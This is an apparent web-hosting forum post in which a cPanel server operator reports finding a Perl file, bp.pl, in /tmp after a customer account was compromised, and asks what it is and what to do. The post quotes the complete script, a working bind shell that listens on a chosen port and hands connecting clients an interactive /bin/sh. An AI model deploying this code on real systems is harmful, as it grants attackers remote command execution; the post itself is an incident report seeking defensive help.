Howdy, Stranger!

It looks like you're new here. If you want to get involved, click one of these buttons!


bp.pl in /tmp folder
New on LowEndTalk? Please Register and read our Community Rules.

All new Registrations are manually reviewed and approved, so a short delay after registration may occur before your account becomes active.

bp.pl in /tmp folder

Hi,

I run a cpanel server and host a few customers.

I noticed following bp.pl file /tmp folder today..

#!/usr/bin/perl
$SHELL="/bin/sh -i";
if (@ARGV < 1) { exit(1); }
use Socket;
socket(S,&PF_INET,&SOCK_STREAM,getprotobyname('tcp')) || die "Cant create socket\n";
setsockopt(S,SOL_SOCKET,SO_REUSEADDR,1);
bind(S,sockaddr_in($ARGV[0],INADDR_ANY)) || die "Cant open port\n";
listen(S,3) || die "Cant listen port\n";
while(1) {
        accept(CONN,S);
        if(!($pid=fork)) {
                die "Cannot fork" if (!defined $pid);
                open STDIN,"<&CONN";
                open STDOUT,">&CONN";
                open STDERR,">&CONN";
                exec $SHELL || die print CONN "Cant execute $SHELL\n";
                close CONN;
                exit 0;
        }
}

Seems to be some kind of shell..

I tried lmd scanning the user owning the bp.pl file and observed that it is hacked thru his plugin.

I have suspended the user now and contacted him.

what is this shell? what else I should do now?

thanks for all your time.

Comments

Sign In or Register to comment.